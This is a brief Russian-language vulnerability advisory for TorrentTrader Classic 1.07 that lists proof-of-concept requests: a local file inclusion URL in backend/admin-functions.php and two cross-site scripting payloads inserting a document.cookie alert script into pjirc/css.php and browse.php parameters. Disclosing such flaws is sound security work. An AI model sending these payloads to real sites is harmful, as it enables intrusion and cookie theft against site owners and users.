Программа: TorrentTrader Classic 1.07

Уязвимость позволяет нападающему выполнить произвольный скрипт в контексте безопасности уязвимого сайта или произвольный PHP-сценарий на целевой системе.

Примеры:

Подключение локального файла

backend/admin-functions.php?ss_uri=dd

Межсайтовый скриптинг

pjirc/css.php?color=<script>alert(document.cookie);</script>
browse.php?cat=<script>alert(document.cookie);</script>



Оставить мнение